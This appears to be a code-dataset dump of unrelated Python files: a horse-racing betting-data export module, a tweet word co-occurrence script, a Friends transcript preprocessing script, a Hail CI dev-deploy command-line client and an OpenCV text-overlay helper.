\"UMABAN_2\"])\n target_df = target_df.query(\"UMABAN_1 != UMABAN_2\")\n target_df = 
target_df.drop_duplicates(subset=[\"RACE_KEY\", \"UMABAN_1\", \"UMABAN_2\"])\n return target_df\n\n def get_umatan_target_df(self, uma1_df, uma2_df):\n add_uma1_df = pd.merge(uma1_df, self.res_raceuma_df, on=[\"RACE_KEY\", \"UMABAN\"]).add_suffix(\"_1\").rename(\n columns={\"RACE_KEY_1\": \"RACE_KEY\"})\n add_uma2_df = pd.merge(uma2_df, self.res_raceuma_df, on=[\"RACE_KEY\", \"UMABAN\"]).add_suffix(\"_2\").rename(\n columns={\"RACE_KEY_2\": \"RACE_KEY\"})\n base_df = pd.merge(add_uma1_df, add_uma2_df, on=\"RACE_KEY\")\n base_df = base_df.query(\"UMABAN_1 != UMABAN_2\")\n odds_df = self.ext.get_odds_df(\"馬単\")\n target_df = pd.merge(base_df, odds_df, on=[\"RACE_KEY\", \"UMABAN_1\", \"UMABAN_2\"])\n target_df = pd.merge(target_df, self.race_df, on=[\"RACE_KEY\", \"target_date\"])\n target_df = target_df.rename(columns={\"馬単オッズ\": \"オッズ\"})\n return target_df\n\n def get_wide_target_df(self, uma1_df, uma2_df):\n add_uma1_df = pd.merge(uma1_df, self.res_raceuma_df, on=[\"RACE_KEY\", \"UMABAN\"]).add_suffix(\"1\").rename(\n columns={\"RACE_KEY1\": \"RACE_KEY\"})\n add_uma2_df = pd.merge(uma2_df, self.res_raceuma_df, on=[\"RACE_KEY\", \"UMABAN\"]).add_suffix(\"2\").rename(\n columns={\"RACE_KEY2\": \"RACE_KEY\"})\n base_df = pd.merge(add_uma1_df, add_uma2_df, on=\"RACE_KEY\")\n base_df = base_df.query(\"UMABAN1 != UMABAN2\")\n base_df.loc[:, \"UMABAN_bet\"] = base_df.apply(lambda x: sorted([x[\"UMABAN1\"], x[\"UMABAN2\"]]), axis=1)\n base_df.loc[:, \"UMABAN_1\"] = base_df[\"UMABAN_bet\"].apply(lambda x: x[0])\n base_df.loc[:, \"UMABAN_2\"] = base_df[\"UMABAN_bet\"].apply(lambda x: x[1])\n odds_df = self.ext.get_odds_df(\"ワイド\")\n target_df = pd.merge(base_df, odds_df, on=[\"RACE_KEY\", \"UMABAN_1\", \"UMABAN_2\"])\n target_df = pd.merge(target_df, self.race_df, on=[\"RACE_KEY\", \"target_date\"])\n target_df = target_df.drop_duplicates(subset=[\"RACE_KEY\", \"UMABAN_1\", \"UMABAN_2\"])\n target_df = target_df.rename(columns={\"ワイドオッズ\": \"オッズ\"})\n return target_df\n\n def get_sanrenpuku_target_df(self, uma1_df, uma2_df, uma3_df):\n add_uma1_df = pd.merge(uma1_df, self.res_raceuma_df, on=[\"RACE_KEY\", \"UMABAN\"]).add_suffix(\"1\").rename(columns={\"RACE_KEY1\":\"RACE_KEY\"})\n add_uma2_df = pd.merge(uma2_df, self.res_raceuma_df, on=[\"RACE_KEY\", \"UMABAN\"]).add_suffix(\"2\").rename(columns={\"RACE_KEY2\":\"RACE_KEY\"})\n add_uma3_df = pd.merge(uma3_df, self.res_raceuma_df, on=[\"RACE_KEY\", \"UMABAN\"]).add_suffix(\"3\").rename(columns={\"RACE_KEY3\":\"RACE_KEY\"})\n base_df = pd.merge(add_uma1_df, add_uma2_df, on=\"RACE_KEY\")\n base_df = pd.merge(base_df, add_uma3_df, on=\"RACE_KEY\")\n base_df = base_df.query(\"(UMABAN1 != UMABAN2) and (UMABAN2 != UMABAN3) and (UMABAN3 != UMABAN1)\")\n base_df.loc[:, \"UMABAN_bet\"] = base_df.apply(lambda x: sorted([x[\"UMABAN1\"], x[\"UMABAN2\"], x[\"UMABAN3\"]]), axis=1)\n base_df.loc[:, \"UMABAN_1\"] = base_df[\"UMABAN_bet\"].apply(lambda x: x[0])\n base_df.loc[:, \"UMABAN_2\"] = base_df[\"UMABAN_bet\"].apply(lambda x: x[1])\n base_df.loc[:, \"UMABAN_3\"] = base_df[\"UMABAN_bet\"].apply(lambda x: x[2])\n odds_df = self.ext.get_odds_df(\"三連複\")\n target_df = pd.merge(base_df, odds_df, on=[\"RACE_KEY\", \"UMABAN_1\", \"UMABAN_2\", \"UMABAN_3\"])\n target_df = pd.merge(target_df, self.race_df, on=[\"RACE_KEY\", \"target_date\"])\n target_df = target_df.drop_duplicates(subset=[\"RACE_KEY\", \"UMABAN_1\", \"UMABAN_2\", \"UMABAN_3\"])\n target_df = target_df.rename(columns={\"3連複オッズ\": \"オッズ\"})\n return target_df\n\n def 
create_result_raceuma_mark_file(self):\n ru_cluster_path = self.target_path + \"UmaMark8/\"\n for file in self.file_list:\n print(file)\n file_text = \"\"\n temp_df = self.raceuma_result_df.query(f\"file_id == '{file}'\")\n nichiji_list = sorted(temp_df[\"nichiji\"].drop_duplicates())\n for nichiji in nichiji_list:\n temp2_df = temp_df.query(f\"nichiji == '{nichiji}'\")\n race_list = sorted(temp2_df[\"RACE_KEY\"].drop_duplicates())\n for race in race_list:\n line_text = \" \"\n temp3_df = temp2_df.query(f\"RACE_KEY == '{race}'\").sort_values(\"UMABAN\")\n i = 0\n for idx, val in temp3_df.iterrows():\n if len(str(val[\"ru_cluster\"])) == 1:\n line_text += ' ' + str(val[\"ru_cluster\"])\n else:\n line_text += ' '\n i += 1\n if i != 18:\n for j in range(i, 18):\n line_text += \" \"\n file_text += line_text + '\\r\\n'\n with open(ru_cluster_path + \"UM\" + file + \".DAT\", mode='w', encoding=\"shift-jis\") as f:\n f.write(file_text.replace('\\r', ''))\n\n def create_result_race_comment_file(self):\n for file in self.rc_file_list:\n print(file)\n race_comment_df = self.race_result_df.query(f\"rc_file_id == '{file}'\")[[\"RACE_KEY\", \"レースコメント\"]].sort_values(\n \"RACE_KEY\")\n folder_path = self.target_path + \"RACE_COM/20\" + file[4:6]\n filename = file + \".dat\"\n self._export_file(race_comment_df, folder_path, filename, False)\n# race_comment_df.to_csv(self.target_path + \"RACE_COM/20\" + file[4:6] + \"/\" + file + \".dat\", header=False,\n# index=False, encoding=\"cp932\")\n\n def create_result_raceuma_comment_file(self):\n for file in self.kc_file_list:\n print(file)\n race_comment_df = self.raceuma_result_df.query(f\"kc_file_id == '{file}'\")[[\"RACE_KEY\", \"UMABAN\", \"レース馬コメント\"]]\n race_comment_df.loc[:, \"RACE_UMA_KEY\"] = race_comment_df[\"RACE_KEY\"] + race_comment_df[\"UMABAN\"]\n race_comment_df = race_comment_df[[\"RACE_UMA_KEY\", \"レース馬コメント\"]].sort_values(\"RACE_UMA_KEY\")\n folder_path = self.target_path + \"KEK_COM/20\" + file[4:6]\n filename = file + \".dat\"\n self._export_file(race_comment_df, folder_path, filename, False)\n# race_comment_df.to_csv(self.target_path + \"KEK_COM/20\" + file[4:6] + \"/\" + file + \".dat\", header=False,\n# index=False, encoding=\"cp932\")\n\n def create_pbi_file(self):\n ## race\n race_df = self.ext.get_race_before_table_base()\n race_df.loc[:, \"レースNo\"] = race_df[\"RACE_KEY\"].str[6:8]\n race_df.loc[:, \"種別\"] = race_df[\"種別\"].apply(lambda x: mu.convert_shubetsu(x))\n race_df.loc[:, \"芝ダ\"] = race_df[\"芝ダ障害コード\"].apply(lambda x: mu.convert_shida(x))\n race_df.loc[:, \"コース名\"] = race_df.apply(lambda x: self._get_course_name(x), axis=1)\n race_df = race_df[[\"RACE_KEY\", \"場名\", \"レースNo\", \"距離\", \"芝ダ\", \"種別\", \"条件\", \"target_date\", \"コース名\",\n \"発走時間\", \"レース名9文字\", \"WIN5フラグ\"]].copy()\n race_df.loc[:, \"年月\"] = race_df[\"target_date\"].str[0:6]\n yearmonth_list = race_df[\"年月\"].drop_duplicates()\n for ym in yearmonth_list:\n temp_df = race_df.query(f\"年月 == '{ym}'\")\n self._export_file(temp_df, self.for_pbi_path + '/race/', ym + \".csv\", True)\n ## raceuma\n raceuma_df = self.ext.get_raceuma_before_table_base()\n raceuma_df = raceuma_df[[\"RACE_KEY\", \"UMABAN\", \"基準オッズ\", \"基準人気順位\", \"騎手名\", \"調教師名\", \"馬名\", \"血統登録番号\",\n \"IDM\", \"負担重量\", \"枠番\", \"脚質\", \"距離適性\", \"芝適性コード\", \"ダ適性コード\", \"テン指数\",\n \"ペース指数\", \"上がり指数\", \"位置指数\", \"性別コード\", \"馬主会コード\", \"走法\", \"芝ダ障害フラグ\", \"距離フラグ\",\n \"クラスフラグ\", \"転厩フラグ\", \"去勢フラグ\", \"乗替フラグ\", \"放牧先ランク\", \"厩舎ランク\", \"調教コースコード\",\n \"追切種類\", \"追い状態\", \"調教タイプ\", \"調教距離\", \"調教重点\", 
\"仕上指数\", \"調教量評価\", \"仕上指数変化\", \"target_date\"]].copy()\n raceuma_df = pd.merge(raceuma_df, self.target_mark_df, on=[\"RACE_KEY\", \"UMABAN\"])\n win5_df = self.win5_df[[\"RACE_KEY\", \"UMABAN\", \"predict_rank\"]].copy()\n win5_df.columns = [\"RACE_KEY\", \"UMABAN\", \"win5_rank\"]\n win_df = self.win_df[[\"RACE_KEY\", \"UMABAN\", \"predict_rank\"]].copy()\n win_df.columns = [\"RACE_KEY\", \"UMABAN\", \"win_rank\"]\n jiku_df = self.jiku_df[[\"RACE_KEY\", \"UMABAN\", \"predict_rank\"]].copy()\n jiku_df.columns = [\"RACE_KEY\", \"UMABAN\", \"jiku_rank\"]\n ana_df = self.ana_df[[\"RACE_KEY\", \"UMABAN\", \"predict_rank\"]].copy()\n ana_df.columns = [\"RACE_KEY\", \"UMABAN\", \"ana_rank\"]\n nigeuma_df = self.nigeuma_df[[\"RACE_KEY\", \"UMABAN\", \"predict_rank\"]].copy()\n nigeuma_df.columns = [\"RACE_KEY\", \"UMABAN\", \"nige_rank\"]\n agari_df = self.agari_df[[\"RACE_KEY\", \"UMABAN\", \"predict_rank\"]].copy()\n agari_df.columns = [\"RACE_KEY\", \"UMABAN\", \"agari_rank\"]\n ten_df = self.ten_df[[\"RACE_KEY\", \"UMABAN\", \"predict_rank\"]].copy()\n ten_df.columns = [\"RACE_KEY\", \"UMABAN\", \"ten_rank\"]\n total_df = self.total_df[[\"RACE_KEY\", \"UMABAN\", \"predict_rank\"]].copy()\n total_df.columns = [\"RACE_KEY\", \"UMABAN\", \"total_rank\"]\n point_df = self.point_df[[\"RACE_KEY\", \"UMABAN\", \"predict_rank\"]].copy()\n point_df.columns = [\"RACE_KEY\", \"UMABAN\", \"point_rank\"]\n raceuma_df = pd.merge(raceuma_df, win5_df, on=[\"RACE_KEY\", \"UMABAN\"], how='left')\n raceuma_df = pd.merge(raceuma_df, win_df, on=[\"RACE_KEY\", \"UMABAN\"])\n raceuma_df = pd.merge(raceuma_df, jiku_df, on=[\"RACE_KEY\", \"UMABAN\"])\n raceuma_df = pd.merge(raceuma_df, ana_df, on=[\"RACE_KEY\", \"UMABAN\"])\n raceuma_df = pd.merge(raceuma_df, nigeuma_df, on=[\"RACE_KEY\", \"UMABAN\"])\n raceuma_df = pd.merge(raceuma_df, agari_df, on=[\"RACE_KEY\", \"UMABAN\"])\n raceuma_df = pd.merge(raceuma_df, ten_df, on=[\"RACE_KEY\", \"UMABAN\"])\n raceuma_df = pd.merge(raceuma_df, total_df, on=[\"RACE_KEY\", \"UMABAN\"])\n raceuma_df = pd.merge(raceuma_df, point_df, on=[\"RACE_KEY\", \"UMABAN\"])\n raceuma_df.loc[:, \"RACE_UMA_ID\"] = raceuma_df[\"RACE_KEY\"].str.cat(raceuma_df[\"UMABAN\"])\n raceuma_df.loc[:, \"年月\"] = raceuma_df[\"target_date\"].str[0:6]\n yearmonth_list = raceuma_df[\"年月\"].drop_duplicates()\n for ym in yearmonth_list:\n temp_df = raceuma_df.query(f\"年月 == '{ym}'\")\n self._export_file(temp_df, self.for_pbi_path + '/raceuma/', ym + \".csv\", True)\n ## bet\n bet_df = pd.merge(self.target_bet_df, self.race_base_df[[\"NENGAPPI\", \"RACE_ID\"]], on=\"RACE_ID\")\n bet_df.loc[:, \"年月\"] = bet_df[\"NENGAPPI\"].str[0:6]\n yearmonth_list = bet_df[\"年月\"].drop_duplicates()\n for ym in yearmonth_list:\n temp_df = bet_df.query(f\"年月 == '{ym}'\")\n self._export_file(temp_df, self.for_pbi_path + '/bet/', ym + \".csv\", True)\n\n\n def create_pbi_result_file(self):\n ## race_result\n race_result_df = self.ext.get_race_table_base()\n race_result_df.loc[:, \"種別\"] = race_result_df[\"種別\"].apply(lambda x: mu.convert_shubetsu(x))\n race_result_df.loc[:, \"芝ダ\"] = race_result_df[\"芝ダ障害コード\"].apply(lambda x: mu.convert_shida(x))\n race_result_df.loc[:, \"コース名\"] = race_result_df.apply(lambda x: self._get_course_name(x), axis=1)\n race_result_df = race_result_df[[\"RACE_KEY\", \"距離\", \"芝ダ\", \"右左\", \"内外\", \"種別\", \"条件\", \"グレード\", \"レース名9文字\", \"コース名\",\n \"WIN5フラグ\", \"場名\", \"芝馬場状態コード\", \"ダ馬場状態コード\", \"芝種類\", \"草丈\", \"転圧\", \"凍結防止剤\",\n \"中間降水量\", \"レースコメント\", \"ハロンタイム01\", \"ハロンタイム02\", \"ハロンタイム03\", 
\"ハロンタイム04\",\n \"ハロンタイム05\", \"ハロンタイム06\", \"ハロンタイム07\", \"ハロンタイム08\", \"ハロンタイム09\", \"ハロンタイム10\",\n \"ハロンタイム11\", \"ハロンタイム12\", \"ハロンタイム13\", \"ハロンタイム14\", \"ハロンタイム15\", \"ハロンタイム16\",\n \"ハロンタイム17\", \"ハロンタイム18\", \"ラスト5ハロン\", \"ラスト4ハロン\", \"ラスト3ハロン\", \"ラスト2ハロン\",\n \"ラスト1ハロン\", \"ラップ差4ハロン\", \"ラップ差3ハロン\", \"ラップ差2ハロン\", \"ラップ差1ハロン\", \"RAP_TYPE\",\n \"TRACK_BIAS_ZENGO\", \"TRACK_BIAS_UCHISOTO\", \"target_date\"]].copy()\n race_result_df = pd.merge(race_result_df, self.race_base_df[[\"RACE_KEY\", \"RACE_ID\"]], on=\"RACE_KEY\")\n race_result_df.loc[:, \"年月\"] = race_result_df[\"target_date\"].str[0:6]\n yearmonth_list = race_result_df[\"年月\"].drop_duplicates()\n for ym in yearmonth_list:\n temp_df = race_result_df.query(f\"年月 == '{ym}'\")\n self._export_file(temp_df, self.for_pbi_path + '/race_result/', ym + \".csv\", True)\n ## raceuma_result\n raceuma_result_df = self.ext.get_raceuma_table_base()\n raceuma_result_df = raceuma_result_df[[\"RACE_KEY\", \"UMABAN\", \"基準オッズ\", \"基準人気順位\", \"騎手名\", \"調教師名\", \"馬名\", \"血統登録番号\", \"着順\",\n \"IDM\", \"負担重量\", \"枠番\", \"脚質\", \"距離適性\", \"芝適性コード\", \"ダ適性コード\", \"テン指数\",\n \"ペース指数\", \"上がり指数\", \"位置指数\", \"性別コード\", \"馬主会コード\", \"走法\", \"芝ダ障害フラグ\", \"距離フラグ\",\n \"クラスフラグ\", \"転厩フラグ\", \"去勢フラグ\", \"乗替フラグ\", \"放牧先ランク\", \"厩舎ランク\", \"調教コースコード\",\n \"追切種類\", \"追い状態\", \"調教タイプ\", \"調教距離\", \"調教重点\", \"仕上指数\", \"調教量評価\", \"仕上指数変化\",\n \"タイム\", \"確定単勝オッズ\", \"確定単勝人気順位\", \"IDM結果\", \"テン指数結果\", \"上がり指数結果\", \"ペース指数結果\",\n \"前3Fタイム\", \"後3Fタイム\", \"コーナー順位1\", \"コーナー順位2\", \"コーナー順位3\", \"コーナー順位4\", \"馬体重\",\n \"レース脚質\", \"単勝\", \"複勝\", \"レース馬コメント\", \"馬具(その他)コメント\", \"パドックコメント\", \"脚元コメント\", \"target_date\"]].copy()\n raceuma_result_df = pd.merge(raceuma_result_df, self.race_base_df[[\"RACE_KEY\", \"RACE_ID\"]], on=\"RACE_KEY\")\n raceuma_result_df.loc[:, \"年月\"] = raceuma_result_df[\"target_date\"].str[0:6]\n raceuma_result_df.loc[:, \"RACE_UMA_ID\"] = raceuma_result_df[\"RACE_KEY\"].str.cat(raceuma_result_df[\"UMABAN\"])\n yearmonth_list = raceuma_result_df[\"年月\"].drop_duplicates()\n for ym in yearmonth_list:\n temp_df = raceuma_result_df.query(f\"年月 == '{ym}'\")\n self._export_file(temp_df, self.for_pbi_path + '/raceuma_result/', ym + \".csv\", True)\n ## haraimodoshi\n haraimodoshi_df = self.ext.get_haraimodoshi_table_base()\n tansho_df = self.ext.get_tansho_df(haraimodoshi_df)\n tansho_df.loc[:, \"券種\"] = \"単勝\"\n fukusho_df = self.ext.get_fukusho_df(haraimodoshi_df)\n fukusho_df.loc[:, \"券種\"] = \"複勝\"\n umaren_df = self.ext.get_umaren_df(haraimodoshi_df)\n umaren_df.loc[:, \"券種\"] = \"馬連\"\n umatan_df = self.ext.get_umatan_df(haraimodoshi_df)\n umatan_df.loc[:, \"券種\"] = \"馬単\"\n wide_df = self.ext.get_wide_df(haraimodoshi_df)\n wide_df.loc[:, \"券種\"] = \"ワイド\"\n sanrenpuku_df = self.ext.get_sanrenpuku_df(haraimodoshi_df)\n sanrenpuku_df.loc[:, \"券種\"] = \"三連複\"\n return_df = pd.concat([tansho_df, fukusho_df, umaren_df, umatan_df, wide_df, sanrenpuku_df])\n return_df = pd.merge(return_df, self.race_base_df[[\"NENGAPPI\", \"RACE_KEY\"]], on=\"RACE_KEY\")\n return_df.loc[:, \"年月\"] = return_df[\"NENGAPPI\"].str[0:6]\n yearmonth_list = return_df[\"年月\"].drop_duplicates()\n for ym in yearmonth_list:\n temp_df = return_df.query(f\"年月 == '{ym}'\")\n self._export_file(temp_df, self.for_pbi_path + '/return/', ym + \".csv\", True)\n\n def _export_file(self, df, folder_path, filename, header):\n if not os.path.exists(folder_path):\n os.makedirs(folder_path)\n df.to_csv(folder_path + \"/\" + filename, header=header, index=False, encoding=\"cp932\")\n\n def 
_return_mark(self, num):\n if num == 1: return \"◎\"\n if num == 2: return \"○\"\n if num == 3: return \"▲\"\n if num == 4: return \"△\"\n if num == 5:\n return \"×\"\n else:\n return \" \"\n\n def _get_target_bet_df(self, bet_df):\n bet_df = pd.merge(bet_df, self.race_base_df, on=\"RACE_KEY\")\n bet_df.loc[:, \"変換フラグ\"] = 0\n bet_df.loc[:, \"購入金額\"] = 100\n bet_df.loc[:, \"的中時の配当\"] = 0\n bet_df.loc[:, \"エリア\"] = \"F\"\n bet_df.loc[:, \"マーク\"] = \"\"\n bet_df = bet_df[[\"RACE_ID\", \"変換フラグ\", \"券種\", \"目1\", \"目2\", \"目3\", \"購入金額\", \"オッズ\", \"的中時の配当\", \"エリア\", \"マーク\"]].copy()\n return bet_df\n\n def _get_course_name(self, sr):\n soto = \"外\" if sr[\"内外\"] == \"2\" else \"\"\n return sr[\"場名\"] + sr[\"芝ダ\"] + str(sr[\"距離\"]) +\"m\" + soto\n\n @classmethod\n def post_slack_text(cls, post_text):\n slack = slackweb.Slack(url=cls.slack_operation_url)\n #slack.notify(text=post_text)\n\n\n\n","sub_path":"modules/output.py","file_name":"output.py","file_ext":"py","file_size_in_byte":53709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"601376123","text":"import sqlite3\nfrom collections import Counter\nimport re\nimport math\nimport itertools\nimport codecs\nimport json\n\n\n#dbname = 'egypt.db'\n#tablename = 'egypt_tweets'\n#colname = 'tweet'\n\n#dbname = 'japan.db'\n#tablename = 'merged_tweets_4'\n#colname = 'text'\n\ndbname = 'libya.db'\ntablename = 'libya'\ncolname = 'text'\n\n\nconn = sqlite3.connect(dbname)\n\nprint(\"Opened database successfully\")\n\nwordcount = Counter()\n\nprint(\"scan #1 start\")\ncursor = conn.execute(\"SELECT id, \" + colname + \" from \" + tablename)\nfor row in cursor:\n #print(str(row[0]) + ' ' + row[1])\n #print(str(row[0]))\n tweet = row[1]\n urls = re.findall('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', tweet)\n for url in urls:\n tweet = tweet.replace(url,'')\n words = re.findall(r\"#?[\\w']+\", tweet)\n for word in words:\n lword = word.lower()\n wordcount[lword] += 1\nprint(\"scan #1 complete\")\n\nprint(len(wordcount))\n\n#for word in wordcount.keys():\n# print(word, wordcount[word])\n\nprint(\"filter first pass start\")\nwordlist = [(word,wordcount[word]) for word in wordcount.keys()]\nwordlist.sort(key=lambda x: (x[1],x[0]), reverse=True)\n\nuseless_words = ['rt','quot',\"won't\",'at','with',\"they're\",'him',\"we'll\",\"i'm\",'very',\"i'd\",'what','me',\"that's\",'why','then','who','had','would','could',\"let's\",\"we'll\",'also','their','us','by','am','that','was','all','some','many','your','its','get','he','she','an','them','our','we','i','it','the','being','and','of','to','in','on','not','you','com','http','a','my','this','will','is','they','are','if','there','did','for','any','has','from','no','as','so','or','have','too','his','her','be','but',\"it's\",\"haven't\",'should','were','only']\n\n#for useless in useless_words:\n# if useless in wordlist:\n# print('removing ' + useless)\n# wordlist.remove(useless)\n\nnew_wordlist = []\n\nfor word in wordlist:\n if word[0] not in useless_words and len(word[0]) > 1:\n new_wordlist.append(word)\n\nlimit = 10000\n\nupperten = min(limit, math.ceil(len(new_wordlist) / 10))\n\ncandidate_words = [word[0] for word in new_wordlist[:upperten]]\nminwords = new_wordlist[upperten - 1][1]\nprint(upperten)\n\ncandidate_set = set()\n[candidate_set.add(word) for word in candidate_words]\n\ncandidate_words = candidate_set\n\n\nprint(\"filter first pass complete\")\n\n#for i in wordlist[:upperten]:\n# if i[0] not in 
useless_words:\n#        #print(i)\n#        candidate_words.append(i[0])\n\ncursor = conn.execute(\"SELECT count(*) from \" + tablename)\nfor r in cursor:\n    print(\"tweet count: \" + str(r[0]))\n\ncombocount = Counter()\nprint(\"scan #2 start\")\ncount = 0\ncursor = conn.execute(\"SELECT id, \" + colname + \" from \" + tablename)\nfor row in cursor:\n    #print(str(row[0]) + ' ' + row[1])\n    #print(str(row[0]))\n    tweet = row[1]\n    urls = re.findall('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', tweet)\n    for url in urls:\n        tweet = tweet.replace(url,'')\n    words = re.findall(r\"#?[\\w']+\", tweet)\n    #print(tweet)\n    cands = []\n    for word in words:\n        lword = word.lower()\n        if lword in candidate_words:\n            cands.append(lword)\n    if len(cands) > 1:\n        #print(cands)\n        cands.sort()\n        combs = itertools.combinations(cands,2)\n        for i in combs:\n            combocount[i] += 1\n    \n    count += 1\n    if count % 1000 == 0:\n        print(count)\n\nprint(\"scan #2 complete\")\n\nprint(\"sort combos start\")\ncombolist = [(combo, combocount[combo]) for combo in combocount.keys()]\ncombolist.sort(key=lambda x: (x[1],x[0]), reverse=True)\n\n#upperten2 = min(limit * 5,math.ceil(len(combolist) * 0.2))\n\n#final_combos = combolist[:upperten2]\nfinal_combos = combolist\n\n#print(upperten2)\nprint(\"sort combos complete\")\n\nprint(len(final_combos))\n\nprint(\"Operation done successfully\")\nconn.close()\n\ncombolist = [w for w in final_combos if w[0][0] in candidate_words and w[0][1] in candidate_words and w[1] >= minwords]\n\ncdata = {}\nfor w in combolist:\n    cdata[w[0][0] + '|' + w[0][1]] = w[1]\n    cdata[w[0][1] + '|' + w[0][0]] = w[1]\n\nwith codecs.open(\"combos.txt\", \"w\",\"utf-8-sig\") as text_file:\n    for i in combolist:\n        text_file.write(i[0][0] + '\\t' + i[0][1] + '\\t' + str(i[1]) + '\\n')\n    \nwith codecs.open(\"combos_json.txt\", \"w\",\"utf-8-sig\") as text_file:\n    text_file.write(json.dumps(cdata))\n\nwith codecs.open(\"singles.txt\", \"w\",\"utf-8-sig\") as text_file:\n    for i in sorted(list(candidate_words)):\n        text_file.write(i + '\\t' + str(wordcount[i]) + '\\n')\n    #singlelist[i] = wordcount[i]\n    #text_file.write(json.dumps(singlelist))\n","sub_path":"twitter/egypt_read.py","file_name":"egypt_read.py","file_ext":"py","file_size_in_byte":4602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"292338200","text":"\"\"\"\nThis code separates the Friends transcript dataset into training and label files\n\"\"\"\nfrom __future__ import print_function\nimport operator\nfrom itertools import islice\n\ncounter = 0\ntrain_train_utt = open('temp_temp.utt','w')\ntrain_resp = open('temp.resp','w')\n\nvocab = {}\n\npunctuation = {\n\t\"'\": \" '\",\n\t'\"': ' \" ',\n\t'\\t': ' ',\n\t'?': ' ? ',\n\t',': ' , ',\n\t'.': ' . ',\n\t'!': ' ! 
',\n\t'-': ' - ',\n\t':': ' : ',\n\t# ';': ' ; ',\n\t# '[': ' [ ',\n\t# '[': ' ] ',\n\t# '': '',\n\t# '': '',\n\t'/': ' / '\n}\n\nnum_line = 0\nwith open('friends_processed.txt','r') as file:\n\tfor line in file:\n\t\tnum_line += 1\n\ndef add_to_vocab(sentence):\n\tfor word in sentence.split(' '):\n\t\tif word == '': continue\n\t\tif word not in vocab:\n\t\t\tvocab[word] = 1\n\t\telse:\n\t\t\tvocab[word] += 1\n\ndef format_line_utterance(sentence):\n\t# return sentence\n\tsentence = ' '.join(sentence.lower().split(' ')[1:])\n\tsentence = unicode(sentence, errors='ignore')\n\tfor key in punctuation:\n\t\tsentence = sentence.replace(key,punctuation[key])\n\treturn sentence\n\ndef format_line_response(sentence):\n\t# return sentence\n\tsentence = unicode(sentence.lower(), errors='ignore')\n\tfor key in punctuation:\n\t\tsentence = sentence.replace(key,punctuation[key])\n\treturn sentence\n\nline_ctr = 0\ntrain_file_line_ctr = 0\nstate = 'new_scene'\nremove_lines = []\nwith open('friends_processed.txt','r') as file:\n\tfor line in file:\n\t\tif line[:-1]=='< ':\n\t\t\tstate = 'new_scene'\n\t\t\tline_ctr+=1\n\t\t\tcontinue\n\n\t\tsentence_utt = format_line_utterance(line[:-1])\n\t\tsentence_resp = format_line_response(line[:-1])\n\n\t\tif line_ctr==1 or state=='new_scene':\n\t\t\tprint (sentence_utt, file = train_train_utt)\n\t\t\tstate = 'scene'\n\t\t\tremove_lines.append(train_file_line_ctr)\n\t\t\ttrain_file_line_ctr+=1\n\t\t\tline_ctr+=1\n\t\telif line_ctr==num_line-1:\n\t\t\tprint (sentence_resp, file = train_resp)\n\t\telse:\n\t\t\tprint (sentence_resp, file = train_resp)\n\t\t\tprint (sentence_utt, file = train_train_utt)\n\t\t\ttrain_file_line_ctr+=1\n\t\t\tline_ctr+=1\n\n\t\tadd_to_vocab(sentence_utt)\n\ntrain_train_utt.close()\n\nremove_lines = remove_lines[1:]\n# print (remove_lines)\nline_ctr = 0\ntrain_utt = open('temp.utt','w')\nwith open('temp_temp.utt','r') as file:\n\tfor line in file:\n\t\tline_ctr+=1\n\t\tif line_ctr not in remove_lines:\n\t\t\tprint (line[:-1], file = train_utt)\n\nvocab_file = open('vocab','w')\n\nsorted_x = sorted(vocab.items(), key = operator.itemgetter(1), reverse = True)\n\nfor i in sorted_x:\n\tif i[1] >= 0:\n\t\tprint (str(i[0]), file = vocab_file)","sub_path":"Dataset/Friends Transcripts/prepare_friends.py","file_name":"prepare_friends.py","file_ext":"py","file_size_in_byte":2442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"4942978","text":"import asyncio\nimport aiohttp\n\nfrom hailtop.gear.auth.hailjwt import find_token\n\n\ndef init_parser(parser):\n    parser.add_argument(\"--branch\", \"-b\", type=str,\n                        help=\"Fully-qualified branch, e.g., hail-is/hail:feature.\", required=True)\n    parser.add_argument(\"--steps\", \"-s\", type=str,\n                        help=\"Comma-separated list of steps to run.\", required=True)\n\n\nclass CIClient:\n    def __init__(self):\n        self._session = None\n\n    async def __aenter__(self):\n        token = find_token()\n        self._session = aiohttp.ClientSession(\n            raise_for_status=True,\n            timeout=aiohttp.ClientTimeout(total=60),\n            headers={\"Authorization\": f\"Bearer {token}\"})\n        return self\n\n    async def __aexit__(self, exc_type, exc, tb):\n        await self.close()\n\n    async def close(self):\n        if self._session:\n            await self._session.close()\n            self._session = None\n\n    async def dev_deploy_branch(self, branch, steps):\n        data = {\n            'branch': branch,\n            'steps': steps\n        }\n        async with self._session.post(\n                'https://ci.hail.is/api/v1alpha/dev_deploy_branch/', json=data) as resp:\n            resp_data = await 
resp.json()\n            return resp_data['batch_id']\n\n\nasync def submit(args):\n    steps = args.steps.split(',')\n    steps = [s.strip() for s in steps]\n    steps = [s for s in steps if s]\n    async with CIClient() as ci_client:\n        batch_id = await ci_client.dev_deploy_branch(args.branch, steps)\n        print(f'Created deploy batch, see https://ci.hail.is/batches/{batch_id}')\n\n\ndef main(args):\n    loop = asyncio.get_event_loop()\n    loop.run_until_complete(submit(args))\n    loop.run_until_complete(loop.shutdown_asyncgens())\n","sub_path":"hail/python/hailtop/hailctl/dev/deploy/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"67088957","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport cv2 as cv\nfrom collections import deque\n\n\ndef draw_texts(img, texts, font_scale=1.0, thickness=2):\n    h, w, c = img.shape\n    offset_x = 20  # 左下の座標\n    initial_y = 0\n    dy = int(img.shape[1] / 25)\n    color = (241, 252, 102)  # BGR for RGB #66FCF1 (OpenCV uses BGR order)\n    texts = [texts] if type(texts) == str else texts\n    for i, text in enumerate(texts):\n        offset_y = initial_y + (i+1)*dy\n        cv.putText(img, text, (offset_x, offset_y), cv.FONT_HERSHEY_SIMPLEX,\n                   font_scale, color, thickness, cv.LINE_AA)\n\n\ndef draw_result_on_img(img, texts, w_ratio=0.3, h_ratio=0.2, alpha=0.4):\n    # 